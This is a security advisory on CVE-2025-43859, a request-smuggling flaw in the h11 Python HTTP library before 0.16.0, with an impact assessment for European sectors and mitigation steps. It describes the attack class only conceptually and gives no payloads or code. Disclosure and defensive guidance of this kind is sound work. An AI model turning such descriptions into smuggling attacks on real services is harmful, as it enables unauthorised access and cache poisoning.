CVE-2025-43859 is a vulnerability identified in the python-hyper project's h11 library, a Python implementation of the HTTP/1.1 protocol. The issue stems from inconsistent parsing of HTTP chunked transfer encoding line terminators in versions prior to 0.16.0. Specifically, h11's lenient handling of line terminators in chunked-coded message bodies can lead to HTTP Request Smuggling (CWE-444). HTTP Request Smuggling exploits discrepancies in how different HTTP devices (such as proxies, load balancers, and backend servers) parse and interpret HTTP requests, allowing an attacker to smuggle a malicious request to the backend server that bypasses security controls or manipulates the request flow. In this case, the vulnerability arises when a buggy version of h11 is combined with a buggy reverse proxy or intermediary device that interprets HTTP requests differently. The vulnerability requires both components to be vulnerable for successful exploitation, meaning that patching either the h11 library to version 0.16.0 or the reverse proxy to a secure version mitigates the risk. No known exploits have been observed in the wild to date. The vulnerability impacts applications or services that use h11 for HTTP/1.1 communication, particularly those deployed behind reverse proxies or load balancers that may have inconsistent HTTP parsing behavior. Given the nature of HTTP Request Smuggling, successful exploitation could allow attackers to bypass security controls, poison web caches, perform cross-site scripting or cross-user attacks, and potentially gain unauthorized access or disrupt service availability.

For European organizations, the impact of this vulnerability can be significant in environments where python-hyper's h11 library is used, especially in web services or APIs behind reverse proxies. Exploitation could lead to unauthorized access to sensitive data, session hijacking, or manipulation of HTTP traffic, undermining confidentiality and integrity. Additionally, it could enable attackers to bypass web application firewalls or intrusion detection systems, increasing the risk of further attacks. Availability could also be affected if attackers use request smuggling to cause denial-of-service conditions or disrupt normal traffic flow. Sectors with high reliance on Python-based web frameworks or microservices architectures, such as finance, healthcare, and critical infrastructure, may face elevated risks. The complexity of exploitation requiring a combination of vulnerable components reduces the likelihood of widespread attacks but does not eliminate targeted attacks against high-value European targets. Organizations using reverse proxies or load balancers with known parsing inconsistencies are particularly at risk.

1. Upgrade the python-hyper h11 library to version 0.16.0 or later to ensure the parsing issue is resolved. 2. Audit and update reverse proxies, load balancers, and any HTTP intermediaries to versions that correctly handle HTTP chunked transfer encoding and are not vulnerable to request smuggling. 3. Implement strict HTTP request validation and normalization at the edge to detect and block malformed or suspicious chunked requests. 4. Conduct thorough testing of the HTTP request handling chain in your environment to identify any inconsistencies between components. 5. Employ web application firewalls (WAFs) with specific rules to detect request smuggling patterns. 6. Monitor HTTP traffic logs for anomalies indicative of request smuggling attempts, such as unexpected request boundaries or duplicated headers. 7. Where feasible, consider deploying HTTP/2 or newer protocols that are less susceptible to request smuggling. 8. Educate development and operations teams about the risks of HTTP request smuggling and the importance of consistent HTTP parsing across components.